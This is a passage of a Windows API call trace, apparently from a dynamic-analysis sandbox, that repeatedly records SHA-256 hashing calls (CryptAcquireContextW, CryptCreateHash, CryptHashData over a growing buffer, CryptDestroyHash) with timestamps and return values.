CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0146.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57af0 [0146.997] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.997] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.997] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.998] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.998] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.998] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57dc0 [0146.998] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.998] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.998] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.999] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.999] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x120, dwFlags=0x0) returned 1 [0146.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57c10 [0146.999] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.999] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.999] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.999] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.999] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x140, dwFlags=0x0) returned 1 [0146.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57b20 [0146.999] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.999] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.999] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.000] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.000] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x160, dwFlags=0x0) returned 1 [0147.000] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58120 [0147.000] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.000] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.000] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.001] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.001] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0x180, dwFlags=0x0) returned 1 [0147.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58180 [0147.001] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.001] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.001] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.001] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.001] CryptHashData (hHash=0x332b7dd0, pbData=0x32e4a600, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0147.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57b50 [0147.001] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0147.001] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.001] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.002] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.002] CryptHashData (hHash=0x332b7890, pbData=0x32e4a600, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0147.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e581b0 [0147.002] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.002] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.002] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.003] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.003] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0147.003] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57c40 [0147.003] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0147.003] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.003] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.003] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.003] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x200, dwFlags=0x0) returned 1 [0147.003] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57ca0 [0147.003] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.003] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.003] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.004] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.004] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x220, dwFlags=0x0) returned 1 [0147.004] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57d30 [0147.004] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.004] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.004] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.004] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.005] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x240, dwFlags=0x0) returned 1 [0147.005] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57cd0 [0147.005] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.005] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.005] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.005] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.005] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x260, dwFlags=0x0) returned 1 [0147.005] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e581e0 [0147.005] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.005] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.005] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.006] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.006] CryptHashData (hHash=0x332b7900, pbData=0x32e4a600, dwDataLen=0x280, dwFlags=0x0) returned 1 [0147.006] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58000 [0147.006] CryptDestroyHash (hHash=0x332b7900) returned 1 [0147.006] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.006] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.006] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.006] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0147.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57fa0 [0147.007] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.007] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.007] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.007] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.007] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0147.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57bb0 [0147.007] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.007] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.007] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.008] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.008] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0147.008] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57df0 [0147.008] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.008] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.008] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.008] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.009] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x300, dwFlags=0x0) returned 1 [0147.009] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57d60 [0147.009] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.009] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.009] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.009] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.009] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x320, dwFlags=0x0) returned 1 [0147.009] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57d90 [0147.009] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.009] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.009] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.010] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.010] CryptHashData (hHash=0x332b7890, pbData=0x32e4a600, dwDataLen=0x340, dwFlags=0x0) returned 1 [0147.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58030 [0147.010] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.010] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.010] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.010] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.011] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x360, dwFlags=0x0) returned 1 [0147.011] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57ee0 [0147.011] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.011] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.011] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.011] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.011] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x380, dwFlags=0x0) returned 1 [0147.011] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58150 [0147.011] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.011] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.011] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.012] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.012] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0147.012] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57e20 [0147.012] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.012] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.012] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.012] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.012] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0147.012] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57e50 [0147.013] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.013] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.013] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.013] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.013] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0147.013] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57e80 [0147.013] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.013] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.013] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.014] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.014] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x400, dwFlags=0x0) returned 1 [0147.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57eb0 [0147.014] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.014] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.014] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.014] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.014] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x420, dwFlags=0x0) returned 1 [0147.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57f40 [0147.014] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.014] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.014] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.015] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.015] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x440, dwFlags=0x0) returned 1 [0147.015] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56320 [0147.015] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.015] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.015] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.016] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.016] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x460, dwFlags=0x0) returned 1 [0147.016] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56e60 [0147.016] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.016] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.016] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.016] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.016] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x480, dwFlags=0x0) returned 1 [0147.016] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56980 [0147.016] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.016] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.016] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.017] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.017] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0147.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56620 [0147.017] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.017] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.017] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.018] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.018] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0147.018] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56da0 [0147.018] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.018] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.018] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.018] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.018] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0147.018] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e565f0 [0147.018] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.018] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.018] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.019] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.019] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x500, dwFlags=0x0) returned 1 [0147.019] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56890 [0147.019] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.019] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.019] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.020] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.020] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x520, dwFlags=0x0) returned 1 [0147.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56ad0 [0147.020] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.020] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.020] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.020] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.020] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x540, dwFlags=0x0) returned 1 [0147.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56680 [0147.020] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.020] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.020] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.021] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.021] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x560, dwFlags=0x0) returned 1 [0147.021] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56e00 [0147.021] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.021] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.021] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.022] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.022] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x580, dwFlags=0x0) returned 1 [0147.022] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56470 [0147.022] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.022] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.022] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.022] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.022] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0147.022] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56950 [0147.022] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.022] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.022] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.023] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.023] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0147.023] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56710 [0147.023] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.023] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.023] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.024] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.024] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0147.024] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 